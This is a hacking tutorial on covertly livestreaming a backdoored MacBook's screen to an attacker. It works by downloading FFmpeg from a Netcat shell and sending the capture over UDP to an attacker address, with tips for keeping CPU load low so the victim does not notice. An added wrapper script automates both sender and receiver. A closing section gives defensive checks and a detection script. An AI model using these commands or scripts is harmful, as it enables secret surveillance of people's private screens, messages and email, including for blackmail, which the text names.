
How to Secretly Livestream Someone's MacBook Screen « Null Byte :: WonderHowTo



It is possible to stream the entire screen of a MacBook without using Apple's Screen Sharing application and without opening any listening ports on the target device. A low-profile attacker with a backdoor on the Mac can watch everything the victim does in real time, from anywhere.

In this article I will continue the hacking macOS series by streaming a MacBook's desktop to an attacker's system, so that every move the user makes can be tracked in real time, without touching Apple's screen-sharing features. This assumes the attacker has already established a backdoor on the target Mac. Below is a GIF of the attack in action.

In the GIF, the entire screen of the Apple computer (the victim) is streamed to and viewed on the Kali system (the attacker). This is achieved with FFmpeg, a multimedia framework that can decode, encode, transcode, mux, demux, stream, filter and play almost any media format.

Penetration testers use this kind of attack to collect behavioral information about a target user, and may learn from it how the device and the Wi-Fi network are used, as well as details of the target's personal and professional life. Black-hat hackers would use the same tactic for blackmail, harvesting private emails, chats, iMessages and web-browsing habits that could embarrass the victim professionally or socially.

Step 1: Install FFmpeg in Kali

FFmpeg must be installed on both the attacker's Kali Linux system and the target MacBook. On Kali it is installed with apt-get install ffmpeg, as shown below, just as we did when installing FFmpeg to spy on a MacBook's microphone.

  apt-get install ffmpeg

Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
  ffmpeg-doc
The following packages will be upgraded:
  ffmpeg
1 upgraded, 0 newly installed, 0 to remove and 596 not upgraded.
Need to get 1,622 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 http://archive-3.kali.org/kali kali-rolling/main amd64 ffmpeg amd64 7:3.4.2-2+b1 [1,622 kB]
Fetched 1,622 kB in 3s (540.9 kB/s)
Reading changelogs... Done
(Reading database ... 312014 files and directories currently installed.)
Preparing to unpack .../ffmpeg_7%3a3.4.2-2+b1_amd64.deb ...
Unpacking ffmpeg (7:3.4.2-2+b1) over (7:3.4.2-1+b1) ...
Setting up ffmpeg (7:3.4.2-2+b1) ...
Processing triggers for man-db (2.8.2-1) ...

Step 2: Configuring FFmpeg in Kali

To receive the incoming video stream from the victim's desktop, FFmpeg on the attacker system must not only be installed but also told where to listen. The following command starts FFmpeg as the receiver.

  ffmpeg -i udp://0.0.0.0:10001 /tmp/outputFile.avi

This command instructs FFmpeg to open UDP (udp://) port 10001 and accept input (-i) on any available interface (0.0.0.0). The received video is saved in AVI format as outputFile.avi in the /tmp directory. The port number (10001), the storage directory (/tmp) and the output filename are arbitrary and can be changed as needed. Note that this is the only listening socket in the whole setup, and it lives on the attacker's machine; nothing listens on the Mac.

Step 3: Downloading and Configuring FFmpeg on the Backdoored Mac

Installing FFmpeg on macOS is very easy. In fact there is no installation at all, since no new software is added to privileged directories such as /usr, /Applications or /etc. To use FFmpeg on macOS it is enough to download the binary and execute it as a low-privileged user from the command line. The bulk of this step is the same as in the article on installing FFmpeg on a target MacBook to spy on its microphone.

From the Netcat backdoor on the MacBook, use cURL to download FFmpeg and save the ZIP file to the /tmp directory. A directory other than /tmp can be used to keep the victim from becoming suspicious. This is done with the following command:

  curl 'https://ffmpeg.zeranoe.com/builds/macos64/static/ffmpeg-4.0-macos64-static.zip' -o /tmp/ffmpeg.zip

(The Zeranoe build site has since shut down; any current static macOS build of FFmpeg works the same way.) When the download is complete, uncompress the archive with unzip /tmp/ffmpeg.zip:

  unzip /tmp/ffmpeg.zip

Archive:  ffmpeg.zip
   creating: ffmpeg-4.0-macos64-static/
   creating: ffmpeg-4.0-macos64-static/bin/
  inflating: ffmpeg-4.0-macos64-static/bin/ffmpeg
  inflating: ffmpeg-4.0-macos64-static/bin/ffplay
  inflating: ffmpeg-4.0-macos64-static/bin/ffprobe
   creating: ffmpeg-4.0-macos64-static/doc/
  inflating: ffmpeg-4.0-macos64-static/doc/bootstrap.min.css
  inflating: ffmpeg-4.0-macos64-static/doc/default.css
  inflating: ffmpeg-4.0-macos64-static/doc/developer.html
  inflating: ffmpeg-4.0-macos64-static/doc/faq.html
  inflating: ffmpeg-4.0-macos64-static/doc/fate.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-all.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-bitstream-filters.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-codecs.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-devices.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-filters.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-formats.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-protocols.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-resampler.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-scaler.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg-utils.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffmpeg.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffplay-all.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffplay.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffprobe-all.html
  inflating: ffmpeg-4.0-macos64-static/doc/ffprobe.html
  inflating: ffmpeg-4.0-macos64-static/doc/general.html
  inflating: ffmpeg-4.0-macos64-static/doc/git-howto.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavcodec.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavdevice.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavfilter.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavformat.html
  inflating: ffmpeg-4.0-macos64-static/doc/libavutil.html
  inflating: ffmpeg-4.0-macos64-static/doc/libswresample.html
  inflating: ffmpeg-4.0-macos64-static/doc/libswscale.html
  inflating: ffmpeg-4.0-macos64-static/doc/mailing-list-faq.html
  inflating: ffmpeg-4.0-macos64-static/doc/nut.html
  inflating: ffmpeg-4.0-macos64-static/doc/platform.html
  inflating: ffmpeg-4.0-macos64-static/doc/style.min.css
  inflating: ffmpeg-4.0-macos64-static/LICENSE.txt
   creating: ffmpeg-4.0-macos64-static/presets/
  inflating: ffmpeg-4.0-macos64-static/presets/ffprobe.xsd
  inflating: ffmpeg-4.0-macos64-static/presets/libvpx-1080p.ffpreset
  inflating: ffmpeg-4.0-macos64-static/presets/libvpx-1080p50_60.ffpreset
  inflating: ffmpeg-4.0-macos64-static/presets/libvpx-360p.ffpreset
  inflating: ffmpeg-4.0-macos64-static/presets/libvpx-720p.ffpreset
  inflating: ffmpeg-4.0-macos64-static/presets/libvpx-720p50_60.ffpreset
  inflating: ffmpeg-4.0-macos64-static/README.txt

This creates a new directory named ffmpeg-4.0-macos64-static/ containing a bin/ directory, which in turn holds the ffmpeg binary. Next, cd into that bin/ directory:

  cd ffmpeg-4.0-macos64-static/bin/

Now make sure the ffmpeg binary is actually executable with the chmod command (chmod +x ffmpeg is sufficient and less conspicuous than world-writable permissions):

  chmod 777 ffmpeg 

Then list the available input devices on the Mac with ./ffmpeg -f avfoundation -list_devices true -i "", as shown below.

  ./ffmpeg -f avfoundation -list_devices true -i ""

[AVFoundation input device @ 0x7fda1bc152c0] AVFoundation video devices:
[AVFoundation input device @ 0x7fda1bc152c0] [0] FaceTime HD Camera (Built-in)
[AVFoundation input device @ 0x7fda1bc152c0] [1] Capture screen 0
[AVFoundation input device @ 0x7fda1bc152c0] AVFoundation audio devices:
[AVFoundation input device @ 0x7fda1bc152c0] [0] USB Audio CODEC
[AVFoundation input device @ 0x7fda1bc152c0] [1] Built-in Microphone

This command forces (-f) FFmpeg to use the AVFoundation input format and to list (-list_devices true) all available devices instead of capturing from an input (-i ""). AVFoundation addresses inputs with the convention "video:audio", so the "Capture screen 0" entry, video device 1, is selected as "1:" (or simply "1") in the next command.

To capture the entire MacBook display as video, run the following command from the Netcat shell on the backdoored MacBook:

  ./ffmpeg -f avfoundation -i "1" -f avi udp://ATTACKER-IP-ADDRESS:PORT

This is the FFmpeg command in its simplest form: it instructs FFmpeg to use Apple's AVFoundation (-f avfoundation), take the screen as input (-i "1"), encode it in AVI format (-f avi) and send it over UDP (udp://) to the attacker's system. A number of additional arguments (shown in later steps) can be added to tune the video output. Because UDP is connectionless, the Mac simply fires packets at the attacker's address; if nothing is listening there the stream is silently lost, so start the receiver first.

In the Netcat shell, FFmpeg keeps printing status data about the video stream:

  [avfoundation @ 0x7fb5fc004800] Selected pixel format (yuv420p) is not supported by the input device.
[avfoundation @ 0x7fb5fc004800] Supported pixel formats:
[avfoundation @ 0x7fb5fc004800]   uyvy422
[avfoundation @ 0x7fb5fc004800]   yuyv422
[avfoundation @ 0x7fb5fc004800]   nv12
[avfoundation @ 0x7fb5fc004800]   0rgb
[avfoundation @ 0x7fb5fc004800]   bgr0
[avfoundation @ 0x7fb5fc004800] Overriding selected pixel format to use uyvy422 instead.
[avfoundation @ 0x7fb5fc004800] Stream #0: not enough frames to estimate rate; consider increasing probesize
Input #0, avfoundation, from '1':
  Duration: N/A, start: 24679.553333, bitrate: N/A
    Stream #0:0: Video: rawvideo (UYVY / 0x59565955), uyvy422, 1440x900, 1000k tbr, 1000k tbn, 1000k tbc
Stream mapping:
  Stream #0:0 -> #0:0 (rawvideo (native) -> mpeg4 (native))
Press [q] to stop, [?] for help
[avi @ 0x7fb5fc082a00] Frame rate very high for a muxer not efficiently supporting it.
Please consider specifying a lower framerate, a different muxer or -vsync 2
Output #0, avi, to 'udp://192.168.2.13:10001':
  Metadata:
    ISFT            : Lavf58.12.100
    Stream #0:0: Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 1440x900, q=2-31, 200 kb/s, 65535 fps, 600 tbn, 65535 tbc
    Metadata:
      encoder         : Lavc58.18.100 mpeg4
    Side data:
      cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1
frame=  154 fps= 18 q=31.0 size=    1044kB time=00:00:08.60 bitrate= 994.1kbits/s speed=1.01x
frame= 1042 fps= 17 q=31.0 Lsize=    7487kB time=00:01:02.43 bitrate= 982.3kbits/s speed=0.999x
video:7193kB audio:0kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: 4.089208%

Back on the attacker's machine, the FFmpeg terminal also displays stream data and begins writing the video to the specified output file in the /tmp directory. As long as FFmpeg is running on both machines, the MacBook keeps sending video and the attacker's machine keeps saving it. The occasional mpeg4 decode errors visible below are packets lost in transit: UDP offers no retransmission, so the decoder simply conceals the damaged macroblocks.

  Input #0, avi, from 'udp://0.0.0.0:10001':
  Metadata:
    encoder         : Lavf58.12.100
  Duration: 497:06:09.71, start: 0.000000, bitrate: N/A
    Stream #0:0: Video: mpeg4 (Simple Profile) (FMP4 / 0x34504D46), yuv420p, 1440x900 [SAR 1:1 DAR 8:5], 600 fps, 30 tbr, 600 tbn, 65535 tbc
Stream mapping:
  Stream #0:0 -> #0:0 (mpeg4 (native) -> mpeg4 (native))
Press [q] to stop, [?] for help
Output #0, avi, to '/tmp/outputFile.avi':
  Metadata:
    ISFT            : Lavf57.83.100
    Stream #0:0: Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 1440x900 [SAR 1:1 DAR 8:5], q=2-31, 200 kb/s, 30 fps, 30 tbn, 30 tbc
    Metadata:
      encoder         : Lavc57.107.100 mpeg4
    Side data:
      cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1
[mpeg4 @ 0x5610900ed100] Error at MB: 3600
[mpeg4 @ 0x5610900ed100] slice end not reached but screenspace end (11780 left 700303, score= -63)
[mpeg4 @ 0x5610900ed100] concealing 1618 DC, 1618 AC, 1618 MV errors in I frame
frame=  211 fps= 13 q=31.0 size=    1286kB time=00:00:19.83 bitrate= 531.0kbits/s speed=1.19x

Step 4: Install MPV & Watch Streaming Video

The captured video can be played with MPV, a terminal-based media player that handles a wide variety of formats from the command line. Install MPV in Kali with apt-get install mpv.

  apt-get install mpv

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  mpv
0 upgraded, 1 newly installed, 0 to remove and 596 not upgraded.
Need to get 0 B/933 kB of archives.
After this operation, 2,293 kB of additional disk space will be used.
Selecting previously unselected package mpv.
(Reading database ... 311978 files and directories currently installed.)
Preparing to unpack .../mpv_0.27.2-1_amd64.deb ...
Unpacking mpv (0.27.2-1) ...
Setting up mpv (0.27.2-1) ...

Then use MPV to watch the video with:

  mpv --keep-open=yes /tmp/outputFile.avi

The --keep-open argument is not required, but it stops MPV from quitting when it reaches the end of the AVI file.

As mentioned, FFmpeg keeps appending video data to outputFile.avi. Since this happens in real time, MPV occasionally reaches the end of the file before FFmpeg has written the next chunk of the stream, similar to a YouTube video buffering before it can play. MPV cannot play what FFmpeg has not yet written. I would recommend keeping MPV about ten seconds behind the live position for a smooth, near-real-time viewing experience.

Step 5: Optimizing video output (optional)

A major issue I found when streaming video with FFmpeg was its CPU usage on the target MacBook. Streaming the captured screen to my Kali machine took a lot of processing power.

Running top, a tool that displays running processes, on the MacBook while FFmpeg is streaming illustrates the CPU spike:

  Processes: 287 total, 2 running, 285 sleeping, 890 threads                 18:27:25
Networks: packets: 66590/55M in, 464311/526M out. Disks: 141297/3511M read, 102846/1545M written.

PID   COMMAND      %CPU TIME     #TH  #WQ #PORT MEM   PURG CMPR PGRP PPID STATE
4672  master       0.0  00:00.03 1    0   20    884K  0B   0B   4672 1    sleeping
4671  CVMCompiler  0.0  00:00.15 2    2   27    9080K 40K  0B   4671 1    sleeping
4670  ffmpeg       47.6 00:11.17 15   3   144   61M   0B   0B   4510 4521 sleeping
4640  bash         0.0  00:00.04 1    0   19    888K  0B   0B   4640 4639 sleeping
4639  login        0.0  00:00.03 2    1   30    1448K 0B   0B   4639 504  sleeping
4632  netbiosd     0.0  00:00.05 2    2   25    2384K 0B   0B   4632 1    sleeping
4243  com.apple.We 0.0  00:00.24 4    1   66    3496K 0B   0B   4243 1    sleeping

Note the FFmpeg process (PID 4670) at 47.6% CPU while every other application sits at 0.0%. This is a real problem: a MacBook running several applications at once (e.g. Chrome, iMessage, iTunes, Preview) will have noticeably worse battery life, and a CPU held near 50% for an extended period is likely to spin the built-in fan up to full speed, draining the battery further and giving the victim a reason to look at what is running.

After revisiting the FFmpeg options, I found some arguments that reduce the CPU load on the MacBook.

Tip 1. Locking the number of CPU threads

By default FFmpeg sets the thread count to 0, meaning "optimal": FFmpeg decides for itself how best to use the MacBook's CPU. That does not mean battery life gets priority or that CPU spikes are avoided.

To restrict the FFmpeg process to a single thread, add -threads 1 to the command. The improvement is small (only about a 5% drop in CPU usage), but I thought it was worth mentioning.

  ./ffmpeg -f avfoundation -i "1" -threads 1 -f avi udp://ATTACKER-IP-ADDRESS:PORT

Tip 2. Reduce the frame rate

The frame rate, expressed in frames per second (FPS), is the frequency at which successive images (frames) are displayed. In effect it is how many screenshots per second are used to build the video.

By default FFmpeg captures at 30 frames per second. With FFmpeg's -r argument the FPS of the output can be reduced drastically. While this significantly lowers CPU usage on the MacBook, the video becomes choppy and appears to skip; text on screen is still readable, but the result looks more like a picture or GIF that updates once per second. If a smooth high-FPS stream is not required, the following command greatly reduces the CPU load on the MacBook. (Placing -framerate 1 before -i, as an input option to the avfoundation device, limits the capture rate at the source rather than dropping frames after capture, which is where most of the saving comes from.)

  ./ffmpeg -f avfoundation -i "1" -threads 1 -f avi -r 1 udp://ATTACKER-IP-ADDRESS:PORT

Tip 3. Experiment with quality to see what works best

FFmpeg has many options that affect video quality and CPU utilization. I encourage readers to experiment with the available arguments and features. In Kali, the FFmpeg manual can be viewed with the following command.

  man ffmpeg 
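To tie Steps 2, 3 and 5 together, here is an added example wrapper script (my own code, not from the original article or the FFmpeg project) that composes and optionally runs both halves of the stream: the receiver on the Kali side and the sender on the Mac side. The function names, the DRY_RUN switch, the defaults (1 fps, one thread, device "1", binary ./ffmpeg) and the -framerate input option are my additions; it assumes a static ffmpeg binary in the current directory on the Mac and the same paths and ports used above.

```shell
#!/bin/sh
# Added example, not from the original article or the FFmpeg project: one
# wrapper that composes the receiver (Step 2) and sender (Steps 3 and 5)
# commands. Function names, the DRY_RUN switch, the defaults and the
# -framerate input option are my own choices.

# 0 if $1 consists only of decimal digits, 1 otherwise.
is_uint() { case "$1" in ''|*[!0-9]*) return 1 ;; *) return 0 ;; esac; }

# 0 if $1 is a valid port number (1-65535).
valid_port() { is_uint "$1" && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; }

# 0 if $1 is a dotted-quad IPv4 address with every octet in 0-255.
valid_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  rest="$1."
  while [ -n "$rest" ]; do
    octet=${rest%%.*}
    rest=${rest#*.}
    [ "$octet" -le 255 ] || return 1
  done
}

# Attacker side: listen on UDP port $1 on all interfaces, write to $2.
receiver_cmd() {
  port=$1
  out=${2:-/tmp/outputFile.avi}
  valid_port "$port" || { echo "bad port: $port" >&2; return 1; }
  printf 'ffmpeg -i udp://0.0.0.0:%s %s\n' "$port" "$out"
}

# Target side: $1 attacker IP, $2 port, $3 fps (default 1), $4 threads
# (default 1), $5 ffmpeg binary (default ./ffmpeg), $6 avfoundation video
# device index (default "1", the "Capture screen 0" entry from -list_devices).
sender_cmd() {
  ip=$1; port=$2
  fps=${3:-1}; threads=${4:-1}; bin=${5:-./ffmpeg}; dev=${6:-1}
  valid_ipv4 "$ip" || { echo "bad IPv4 address: $ip" >&2; return 1; }
  valid_port "$port" || { echo "bad port: $port" >&2; return 1; }
  is_uint "$fps" && [ "$fps" -ge 1 ] || { echo "bad fps: $fps" >&2; return 1; }
  # -framerate before -i caps the capture rate at the device (the real CPU
  # saving); -r after it fixes the output rate; -threads limits the encoder.
  printf '%s -f avfoundation -framerate %s -i "%s" -threads %s -r %s -f avi udp://%s:%s\n' \
    "$bin" "$fps" "$dev" "$threads" "$fps" "$ip" "$port"
}

# Print the composed command when DRY_RUN is set, otherwise execute it.
run() {
  if [ -n "${DRY_RUN:-}" ]; then printf '%s\n' "$1"; else eval "$1"; fi
}

case "${1:-}" in
  receive) cmd=$(receiver_cmd "$2" "$3") && run "$cmd" ;;
  send)    cmd=$(sender_cmd "$2" "$3" "$4" "$5") && run "$cmd" ;;
  "")      ;;   # no arguments: only define the functions (e.g. when sourced)
  *)       echo "usage: $0 receive PORT [OUTFILE] | send IP PORT [FPS] [THREADS]" >&2; exit 2 ;;
esac
```

Start the receiver first (sh stream.sh receive 10001), then from the Netcat shell on the Mac run sh stream.sh send 192.168.2.13 10001 1 1; set DRY_RUN=1 to print the composed command instead of executing it, which is also a quick way to check the address and port before anything leaves the machine.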

Protection Against Video Streaming Attacks

Antivirus software is unlikely to block this kind of attack. FFmpeg is not considered malicious, it does not open any listening ports, and it does not modify files on the computer.

A Mac user can look for suspicious processes with top or ps, but that is about all they can do on their own, and in a later article I'll show how to hide such processes from a user, so ps and top are not a reliable way to detect this abuse anyway. A few things do stand out, though: an ffmpeg binary running from /tmp or another odd location, a command line containing -f avfoundation, and a steady outbound UDP flow to a single host (visible with lsof -i UDP -n -P or nettop). Since macOS 10.15 (Catalina), screen capture additionally requires the Screen Recording permission under System Preferences > Security & Privacy; without it, captures show only the wallpaper and menu bar and no window contents, so reviewing that list and removing anything unexpected is the most effective defense on current systems.

And unlike the microphone, a user cannot simply unplug a cable to stop screen-capture attacks. Staying offline when a network connection isn't needed would easily mitigate them, since the stream cannot leave the machine.
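As an added example for the defender side (not from the original article), the following script scores ps output for the signatures this technique leaves on the Mac: -f avfoundation on a command line, a network URL as the output, and a capture tool run from a scratch directory. The SAMPLE_PS lines are constructed to resemble ps -axo pid=,ppid=,user=,command= output and are not real captures; the function names and flagging rules are my own.

```shell
#!/bin/sh
# Added example, not from the original article: a defender-side check that
# flags processes looking like a screen or audio capture streamed off the Mac.
# The SAMPLE_PS lines are constructed (not real captures) in the layout of
# `ps -axo pid=,ppid=,user=,command=`; the rules and names are my own.

SAMPLE_PS='4670 4521 alice ./ffmpeg -f avfoundation -i 1 -f avi udp://192.168.2.13:10001
4640 4639 alice bash
4512 1 alice /Applications/Firefox.app/Contents/MacOS/firefox
4801 4640 alice /usr/local/bin/ffmpeg -i movie.mov -c:v libx264 out.mp4
4899 1 alice /private/tmp/.x/ffmpeg -f avfoundation -i :1 -f mp3 udp://10.0.0.5:9000'

# Read ps-style lines on stdin and print "PID<TAB>reasons" for each suspicious
# process. Returns 1 if anything was flagged, 0 otherwise.
flag_capture_procs() {
  hits=0
  while read -r pid ppid user cmd; do
    [ -n "$pid" ] || continue
    capture=0; network=0; oddpath=0; tool=0; reasons=""
    case "$cmd" in *"-f avfoundation"*) capture=1; reasons="$reasons avfoundation-capture" ;; esac
    case "$cmd" in *udp://*|*rtp://*|*tcp://*|*rtmp://*) network=1; reasons="$reasons network-output" ;; esac
    case "$cmd" in /tmp/*|/private/tmp/*|/var/tmp/*|./*|../*) oddpath=1; reasons="$reasons unusual-binary-path" ;; esac
    case "$cmd" in *ffmpeg*|*screencapture*) tool=1; reasons="$reasons capture-tool" ;; esac
    # A capture tool by itself (someone transcoding a movie) is normal. Flag a
    # direct AVFoundation capture, or a network output from a capture tool or
    # from a binary run out of a scratch directory.
    if [ "$capture" -eq 1 ] || { [ "$network" -eq 1 ] && [ $((tool + oddpath)) -ge 1 ]; }; then
      printf '%s\t%s\n' "$pid" "${reasons# }"
      hits=$((hits + 1))
    fi
  done
  [ "$hits" -eq 0 ]
}

# Run the rules over the constructed sample.
scan_sample() { printf '%s\n' "$SAMPLE_PS" | flag_capture_procs; }

# Run the rules over the live process list (these ps options work on macOS and Linux).
scan_live() { ps -axo pid=,ppid=,user=,command= | flag_capture_procs; }

case "${1:-}" in
  live)   scan_live ;;
  sample) scan_sample ;;
esac
```

Run sh check.sh sample to see the two constructed hits (PIDs 4670 and 4899; the legitimate transcode on 4801 is not flagged) and sh check.sh live on a real Mac; pair any hit with lsof -i UDP -n -P -p PID to confirm where the traffic is going.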

Stay tuned for more macOS hacks

So now you know how a hacker can stream audio and video from a backdoored MacBook. But we're not done with hacking Macs yet; there is much more to explore beyond what we've covered so far, so keep coming back for more Mac hacks.

Title image by TheUnownPhotographer/PEXELS; screenshots by tokyoneon/Null Byte

